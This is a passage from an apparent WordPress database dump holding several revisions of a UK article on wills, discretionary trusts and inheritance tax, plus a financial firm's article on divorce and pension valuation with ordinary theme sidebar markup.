effect.\r\n\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\n\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care.\r\n<h2>What else should you consider?</h2>\r\n<em>When getting your affairs in order, there is much more to think about than just your will.</em>\r\n\r\nDon\'t leave your family in the lurch and begin plans for your funeral today. This means that all costs will be covered, as well as the burial or cremation.\r\n\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\">\r\n\r\nAlthough the initial planning of your funeral may seem morbid, however getting these preparations in order has many benefits. People are using pre-paid funeral plans to give peace of mind for them and their loved ones.\r\n\r\nFor residents based in Blackpool and local areas, we recommend FuneralGuide.co.uk as they can assist you with finding the right funeral director, save money and help you plan your funeral.  <a href=\"https://www.funeralguide.co.uk/funeral-directors/blackpool/\" target=\"_blank\">Go to this site</a>.\r\n\r\n</div>\r\n</footer>','Wills and Trusts with Equity SMART','Any transfers between a husband and wife or civil partner are exempt from inheritance tax, so no inheritance tax is payable on the death of the first spouse','inherit','closed','closed','','120-revision-v1','','','2018-05-11 11:07:05','2018-05-11 11:07:05','',120,'http://www.equalitywalk.org.uk/120-revision-v1',0,'revision','',0),(352,1,'2018-05-11 11:09:48','2018-05-11 11:09:48','<h4>Any transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.</h4>\r\n<img class=\"size-medium wp-image-234 alignright\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />With the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\nCreating a standard will, in which all <a href=\"http://smallclaims.me.uk/inheritance-family-provision-act\" target=\"_blank\">inheritance</a> is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations. <a href=\"http://www.equalitywalk.org.uk/start-fundraising\">Find out more about wills</a>.\r\n<h2>Some of the Major Benefits of Discretionary Trust Schemes</h2>\r\n<ul>\r\n 	<li>Access to Financial Funds by the Surviving Spouse</li>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n<h2>Other Important Considerations</h2>\r\n<img class=\"size-medium wp-image-228 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Upon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect. <a href=\"http://www.equalitywalk.org.uk/asset-protection-trust\">Protect your assets</a>.\r\n\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\n\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care.\r\n<h2>What else should you consider?</h2>\r\n<em>When getting your affairs in order, there is much more to think about than just your will.</em>\r\n\r\nDon\'t leave your family in the lurch and begin plans for your funeral today. This means that all costs will be covered, as well as the burial or cremation.\r\n\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\">\r\n\r\nAlthough the initial planning of your funeral may seem morbid, however getting these preparations in order has many benefits. People are using pre-paid funeral plans to give peace of mind for them and their loved ones.\r\n\r\nFor residents based in Blackpool and local areas, we recommend FuneralGuide.co.uk as they can assist you with finding the right funeral director, save money and help you plan your funeral.  <a href=\"https://www.funeralguide.co.uk/funeral-directors/blackpool/\" target=\"_blank\">Go to this site</a>.\r\n\r\n</div>\r\n</footer>','Wills and Trusts with Equity SMART','Any transfers between a husband and wife or civil partner are exempt from inheritance tax, so no inheritance tax is payable on the death of the first spouse','inherit','closed','closed','','120-revision-v1','','','2018-05-11 11:09:48','2018-05-11 11:09:48','',120,'http://www.equalitywalk.org.uk/120-revision-v1',0,'revision','',0),(354,1,'2018-05-21 09:33:12','2018-05-21 09:33:12','<h4>Any transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.</h4>\r\n<img class=\"size-medium wp-image-234 alignright\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />With the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\nCreating a standard will, in which all <a href=\"http://smallclaims.me.uk/inheritance-family-provision-act\" target=\"_blank\">inheritance</a> is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations. <a href=\"http://www.equalitywalk.org.uk/start-fundraising\">Find out more about wills</a>.\r\n<h2>Some of the Major Benefits of Discretionary Trust Schemes</h2>\r\n<ul>\r\n 	<li>Access to Financial Funds by the Surviving Spouse</li>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n<h2>Other Important Considerations</h2>\r\n<img class=\"size-medium wp-image-228 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Upon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect. <a href=\"http://www.equalitywalk.org.uk/asset-protection-trust\">Protect your assets</a>.\r\n\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\n\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care.\r\n<h2>What else should you consider?</h2>\r\n<em>When getting your affairs in order, there is much more to think about than just your will.</em>\r\n\r\nDon\'t leave your family in the lurch and begin plans for your funeral today. This means that all costs will be covered, as well as the burial or cremation.\r\n\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\">\r\n\r\nAlthough the initial planning of your funeral may seem morbid, however getting these preparations in order has many benefits. People are using pre-paid funeral plans to give peace of mind for them and their loved ones.\r\n\r\nFor residents based in Blackpool and local areas, we recommend FuneralGuide.co.uk as they can assist you with finding the right funeral director, save money and help you plan your funeral.  <a href=\"https://www.funeralguide.co.uk/funeral-directors/lancashire/blackpool/\" target=\"_blank\">Go to this site</a>.\r\n\r\n</div>\r\n</footer>','Wills and Trusts with Equity SMART','Any transfers between a husband and wife or civil partner are exempt from inheritance tax, so no inheritance tax is payable on the death of the first spouse','inherit','closed','closed','','120-revision-v1','','','2018-05-21 09:33:12','2018-05-21 09:33:12','',120,'http://www.equalitywalk.org.uk/120-revision-v1',0,'revision','',0),(356,1,'2018-12-18 16:14:19','2018-12-18 16:14:19','<b>“Til Divorce Do Us Part”</b>\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">In February last year the Office for National Statistics released some depressing figures: <span style=\"font-size: 1.17em;\">The ONS estimates that 42% of marriages now end in divorce </span><span style=\"font-size: 1.17em;\">34% of marriages are expected to end in divorce by the 20</span><sup>th</sup><span style=\"font-size: 1.17em;\"><span style=\"font-size: 1.17em;\"> wedding anniversary </span></span>\r\n<span style=\"font-size: 1.17em;\">The greatest chance of divorce is between the 4</span><sup>th</sup><span style=\"font-size: 1.17em;\"> and 8</span><sup>th</sup><span style=\"font-size: 1.17em;\"> wedding anniversaries</span><span style=\"line-height: 1.5em;\"><img class=\"size-medium wp-image-215 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/file3251255366828-193x300.jpg\" alt=\"\" width=\"193\" height=\"300\" />In 2017 there were 127,588 divorces in England and Wales: the comparable figure for Scotland (from the Registrar General) was 9,814.</span> The Scottish figure was the lowest for thirty years – so on the face of it the trend may be reversing. Sadly, that is almost certainly <i>not </i>the case.It is widely accepted that the recession means that many couples who wanted to divorce simply couldn’t afford it – in some cases couples are even having to continue living together after they’ve taken the decision to divorce. But with the economy now improving we will almost certainly see an upturn in the divorce statistics.\r\n\r\nNo-one gets married with the intention of splitting up – but as the figures show, all too often a marriage ends with the couple going their separate ways. If the divorce happens at a relatively young age and there are no children involved then it can be a simple process. If that’s the case with you, this <span style=\"color: #0000ff;\"><a href=\"http://www.resolution.org.uk/\"><span style=\"color: #0000ff;\">website could be useful</span></a>.</span>\r\n\r\nHowever, the longer a couple have been together the more complicated divorce proceedings are likely to be – and the more there will be a need for financial planning advice.\r\n\r\nThis is particularly true once pensions are brought into the divorce proceedings – and this trend will only increase with the Government’s drive to make sure that everyone is ultimately enrolled in a workplace pension.\r\n\r\nThe value of a pension – especially if someone is in a public sector pension scheme – can run into hundreds of thousands of pounds and it can outstrip the value of the family home as the main asset a couple own.\r\n\r\nIn our experience it is still the case the pensions are all too often not valued properly in divorce proceedings, leading to one of the couple – and it is invariably the wife – being ‘short-changed.’\r\n\r\nThe financial calculations involved in divorce proceedings are being further complicated by increasing life expectancy.\r\n\r\nTraditionally, solicitors have relied on the Duxbury Tables, particularly where divorce occurs in later life and one partner is to receive a lump sum which is intended to support him or her for the rest of their life.\r\n\r\nHowever these tables  were drawn up in 1992 (by Mrs Duxbury’s accountant) and life expectancy has increased significantly since then. Equally importantly, accepted rates of growth on investments have <i>decreased</i> significantly.\r\n\r\nWe have some serious doubts regarding these tables, and yet they are still being relied on in many of the divorce cases that we see – often to the significant disadvantage of the wife.\r\n\r\nFinancial planning associated with divorce is not going to become any easier – and it’s one of those areas where you need to take action sooner rather than later. And yet it’s difficult – there’s an understandable reluctance to get involved in the minutiae of pensions planning.\r\n\r\nAt Equity SMART we understand how difficult a divorce can be. That’s why we give efficient, professional, easy-to-understand advice: we’ll take care of the financial side of the divorce, leaving you free to rebuild your life and look after your family. You’ve enough to worry about, without worrying about money.\r\n\r\nIf you feel that you may be heading towards a divorce – or your clients tell you that they may be – then please don’t hesitate to get in touch with us. We’re happy to listen, and to help.\r\n<p class=\"form-submit\"><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8091\" /></p>\r\n\r\n</div>\r\n</div>\r\n<div id=\"respond\" class=\"comment-respond\"></div>\r\n<div id=\"sidebar\" style=\"display: none;\">\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big></center>people who get our best financial wisdom on a weekly basis.\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"heading\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>New Guides</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-holder\"><p>\r\n</p>\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-hold tabs-wrapper\"><p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul id=\"tabs\" class=\"tabset tabs\">\r\n</p>\r\n<p>\r\n</p>\r\n<li><a href=\"#tab-popular\">Popular</a></li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li><a href=\"#tab-recent\">Recent</a></li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-box tabs-container\"><p>\r\n</p>\r\n<p>&#13;\r\n										</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\"><p>\r\n</p>\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										October 12th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../best-annuity-rates/\">&#13;\r\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										March 21st, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\"><p>\r\n</p>\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../5-facts-know-annuities/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 9th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"categories-3\" class=\"widget widget_categories\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"heading\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Post Categories</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a></div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\"><a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\r\n<div class=\"popup\">\r\n<div class=\"holder\">\r\n\r\nRSS\r\n\r\n</div>\r\n</div></li>\r\n</ul>\r\n</ul>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\"><a 